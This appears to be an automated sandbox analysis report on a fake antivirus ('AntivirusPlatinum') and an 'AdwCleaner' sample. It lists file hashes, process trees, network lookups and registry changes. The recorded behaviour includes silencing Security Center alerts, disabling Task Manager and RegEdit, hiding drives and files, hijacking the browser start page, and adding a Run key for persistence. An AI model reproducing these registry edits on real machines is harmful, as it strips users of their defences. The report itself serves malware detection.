SHA256 09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712
SHA512 d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

\??\c:\windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

memory/2416-38-0x0000000000130000-0x000000000013D000-memory.dmp

memory/2416-37-0x0000000000130000-0x000000000013D000-memory.dmp

memory/2468-39-0x0000000000400000-0x000000000040D000-memory.dmp

memory/2616-42-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2468-43-0x0000000000400000-0x000000000040D000-memory.dmp

memory/2492-44-0x00000000031C0000-0x00000000031D0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

Signatures

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\WINDOWS\302746537.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_240658765 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE7-8583-11D1-B16A-00C0F0283628}\ = "IButtons" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000}\InprocServer32\ = "c:\\windows\\comctl32.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\ = "IListItems" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE37-8596-11D1-B16A-00C0F0283628}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A3-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\ = "IPanels" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35053A21-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE5-8583-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ = "Microsoft TabStrip Control 6.0 (SP4)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ToolboxBitmap32\ = "c:\\windows\\mscomctl.ocx, 10" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B5-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F050-858B-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7}\ = "IPanel10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\ = "ISlider" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ = "IListView" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94441-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE32-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B7-8589-11D1-B16A-00C0F0283628}\ = "INodes" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ = "IListSubItems" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F4-EB8B-11CD-8820-08002B2F4F5A} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA42-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B7E6390-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Slider\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\MiscStatus\1\ = "131473" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE34-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA50-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA42-E020-11CF-8E74-00A0C90F26F8}\ = "IButton" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Control C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\30FE.tmp\302746537.bat" "

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 8.192.122.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/4904-20-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\30FE.tmp\302746537.bat

MD5 7d8beb22dfcfacbbc2609f88a41c1458
SHA1 52ec2b10489736b963d39a9f84b66bafbf15685f
SHA256 4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2
SHA512 a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

\??\c:\windows\comctl32.ocx

MD5 821511549e2aaf29889c7b812674d59b
SHA1 3b2fd80f634a3d62277e0508bedca9aae0c5a0d6
SHA256 f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4
SHA512 8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

C:\Windows\MSCOMCTL.OCX

MD5 714cf24fc19a20ae0dc701b48ded2cf6
SHA1 d904d2fa7639c38ffb6e69f1ef779ca1001b8c18
SHA256 09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712
SHA512 d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

C:\Windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

memory/2216-32-0x0000000000400000-0x000000000040D000-memory.dmp

memory/4904-35-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Windows\MSCOMCTL.OCX

MD5 dbdc92c26097147bd64b1b2f6f911bc5
SHA1 6ed5c861bba59c9e90d045469514a3fc53a527a8
SHA256 42b1d8bf222e56b6cc7019f0f6cc4cb4125f9ed0f08eb9a3dd2a855a9eb5bc28
SHA512 81e7071e9421fc3b9cd9787bca6af30e0181e8a6cf45413db6a3014b8f7af949cc9a6f3106f73b7fafc91cb59d6f61253dc05c75f10c395bf2bc0a6797ed4fb3

memory/2216-38-0x0000000000400000-0x000000000040D000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
